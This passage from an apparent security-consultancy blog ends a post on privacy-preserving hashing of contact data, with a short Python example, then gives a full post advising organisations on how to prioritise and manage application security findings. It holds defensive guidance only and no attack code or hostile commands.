However, there is still a problem: if your secret salt is leaked or disclosed, the reversing attacks outlined earlier become possible. To avoid this, increase the complexity of the input by hashing more complex data. So, rather than just hashing the phone number, hash the name, email, and phone number together. This does introduce the problem of causing hashes to disagree if any part of the input differs by misspelling, typos, etc.
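Putting those pieces together, a sketch of the hybrid approach might look like the following. The salt value and the choice of fields are illustrative only, and the simple lower-casing shown is the sort of normalization that reduces (but cannot eliminate) the typo problem:

import hashlib

# Application-wide secret salt. Anyone who learns it can rebuild the lookup
# tables described above, so keep it server-side if your design allows it.
SECRET_SALT = "9835476579080945368095468905486"

def contact_token(name, email, phone):
    # Combine several fields so the input space is much larger than phone
    # numbers alone, then salt and hash. Identical contacts still produce
    # identical tokens, so server-side matching keeps working.
    material = SECRET_SALT + name.strip().lower() + email.strip().lower() + phone
    return hashlib.sha256(material.encode("utf-8")).hexdigest()

print(contact_token("Ada Lovelace", "ada@example.com", "+12345678910"))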

The best way to protect your users’ data from disclosure, and your reputation from damage due to a privacy breach, is to:

  • Don’t collect or send sensitive user data or hashes in the first place – using the security principle of least privilege.
  • Ask for access in a very obvious and unambiguous way – informed consent.

Hit me/us up on twitter ( @neohapsis or @secvalve) if you have any comments or discussion. (Especially if I made an error!)

[Update] Added author byline and clarified some wording.

Groundhog Day in the Application Security World

By Kate Pearce, a Security Consultant and Researcher at Neohapsis

Throughout the US on Groundhog Day, an inordinate amount of media attention will be given to small furry creatures and whether or not they emerge into bright sunlight or cloudy skies. In a tradition that may seem rather topsy-turvy to those not familiar with it, the story says that if the groundhog sees his shadow (indicating the sun is shining), he returns to his hole to sleep for six more weeks and avoid the winter weather that is to come.

Similarly, when a company comes into the world of security and begins to endure the glare of security testing, the shadow of what they find can be enough to send them back into hiding. However, with the right preparation and mindset, businesses can not only withstand the sight of insecurity, they can begin to make meaningful and incremental improvements to ensure that the next time they face the sun the shadow is far less intimidating.

Hundreds or thousands of issues – Why?

It is not uncommon for a Neohapsis consultant to find hundreds of potential issues to sort through when assessing a legacy application or website for the first time. This can be due to a number of reasons, but the most prominent are:

  1. Security tools that are paranoid/badly tuned/misunderstood
  2. Lack of developer security awareness
  3. Threats and technologies have evolved since the application was designed/deployed/developed

Security Tools that are Paranoid/Badly Tuned/Misunderstood

Security testing and auditing tools, by their nature, have to be flexible and able to work in most environments and at various levels of paranoia. Because of this, if they are not configured and interpreted with the specifics of your application in mind, they will often find a large number of issues, of which the majority are noise that should be ignored until the more important issues are fixed. If you have a serious, unauthenticated SQL injection that exposes plain-text credit card and payment details, you probably shouldn’t spend a moment’s thought stressing about whether your website allows 4 or 5 failed logins before locking an account.

Lack of Developer Security Awareness

Developers are human (at least in my experience!), and have all the usual foibles of humanity. They are affected by business pressures to release first and fix bugs later, with the result that security bugs may be de-prioritized as “no-one will find that”, and so “later” never comes. Developers are also often taught about security as an addition rather than a core concept. For instance, when I was learning programming, I was first taught to construct SQL strings and verbatim webpage output, and only much later to use parameterized queries and HTML encoding. As a result, even though I know better, I sometimes find myself falling into bad practices that could introduce SQL injection or cross-site scripting, as the practices that introduce these threats come more naturally to me than the secure equivalents.

Threats and Technologies have Evolved Since the Application was Designed/Deployed/Developed

To make it even harder to manage security, many legacy applications are developed in old technologies which are either unaware of security issues, have no way of dealing with them, or both. For instance, while SQL injection has been known about for around 15 years, and cross-site scripting a little less than that, some threats are far more recent, such as clickjacking and CSS history stealing.

When an application was developed without awareness of a threat, it is often more vulnerable to it, and when it was built on a technology that was less mature in approaching the threat remediating the issues can be far more difficult. For instance, try remediating SQL injection in a legacy ASP application by changing queries from string concatenation to parameterized queries (ADODB objects aren’t exactly elegant to use!).

Dealing with issues

Once you have found issues, then comes the daunting task of prioritizing, managing, and preventing their reoccurrence. This is the part that can bring the shock, and the part that can require the most care, as this is a task in managing complexity.

The response to issues requires not only looking at what you have found previously, but also what you have to do, and where you want to go. Breaking this down:

  1. Understand the Past – Deal with existing issues
  2. Manage the Present – Remedy old issues, prevent introduction of new issues where possible
  3.  Prepare for the Future – Expect new threats to arise

Understand the Past – Deal with Existing Issues

When dealing with security reports, it is important to always be psychologically and organizationally prepared for what you find. As already discussed, this is often unpleasant and the first reactions can lead to dangerous behaviors such as overreaction (“fire the person responsible”) or disillusionment (“we couldn’t possibly fix all that!”). The initial results may be frightening, but flight is not an option, so you need to fight.

To understand what you have in front of you, and to react appropriately, it is imperative that the person interpreting the results understands the tools used to develop the application; the threats surrounding the application; and the security tool and its results. If your organization is not confident in this ability, consider getting outside help or consultants (such as Neohapsis) in to explain the background and context of your findings.

 Manage the present – Remedy old issues, prevent introduction of new issues where possible

Much like any software bug or defect, once you have an idea of what your overall results mean you should start making sense of them. This can be greatly aided through the use of a system (such as Neohapsis Security Manager) which can take vulnerability data from a large number of sources and track issues across time in a similar way to a bug tracker.

Issues found should then be dealt with in order of the threat they present to your application and organization. We have often observed a tendency to go for the vulnerabilities labeled as “critical” by a tool, irrespective of their meaning in the context of your business and application. A SQL injection bug in your administration interface that is only accessible by trusted users is probably a lot less serious than a logic flaw that allows users to order items and modify the price communicated and charged to zero.

Also, if required, your organization should rapidly institute training and awareness programs so that no more avoidable issues are introduced. This can be aided by integrating security testing into your QA and pre-production testing.

 Prepare for the future – Expect new threats to arise

Nevertheless, even if you do everything right, and even if your developers do not introduce any avoidable vulnerabilities, new issues will probably be found as the threats evolve. To detect these, you need to regularly have security tests performed (both human and automated), keep up with the security state of the technologies in use, and have plans in place to deal with any new issues that are found.

Closing

It is not unusual to find a frightening degree of insecurity when you first bring your applications into the world of security testing, but diving back to hide is not prudent. Utilizing the right experience and tools can turn being afraid of your own shadow into being prepared for the changes to come. After all, if the cloud isn’t on the horizon for your company then you are probably already immersed in it.